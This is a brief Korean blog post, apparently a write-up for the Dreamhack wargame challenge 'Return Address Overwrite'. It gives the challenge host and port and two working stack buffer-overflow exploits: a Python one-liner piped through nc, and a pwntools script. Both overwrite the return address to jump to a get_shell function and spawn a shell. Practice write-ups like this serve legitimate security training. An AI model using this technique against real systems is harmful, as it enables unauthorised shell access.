Hacking/System Hacking

[dreamhack] Return Address Overwrite 풀이

솑이 🫧 2022. 3. 31. 16:44

Host: host1.dreamhack.games
Port: 10469/tcp

 

1. python 곡격 μ½”λ“œ 이용 

(python -c "print('A'*0x30 + 'B'*0x8 + '\xaa\x06\x40\x00\x00\x00\x00\x00')";cat)| nc host1.dreamhack.games 10469

 

2. pwntools 이용 

from pwn import *

p = remote('host1.dreamhack.games',10469) # 원격 μ„œλ²„ λŒ€μƒμœΌλ‘œ μ΅μŠ€ν”Œλ‘œμž‡ μˆ˜ν–‰ 
context.arch="amd64" # x86-64 

payload = 'A' * 0x30
payload += 'B' * 0x08
payload += '\xaa\x06\x40\x00\x00\x00\x00\x00' # get_shell address

p.recvuntil('Input: ')
p.sendline(payload)

p.interactive()

 

flag μ–»λŠ” 방법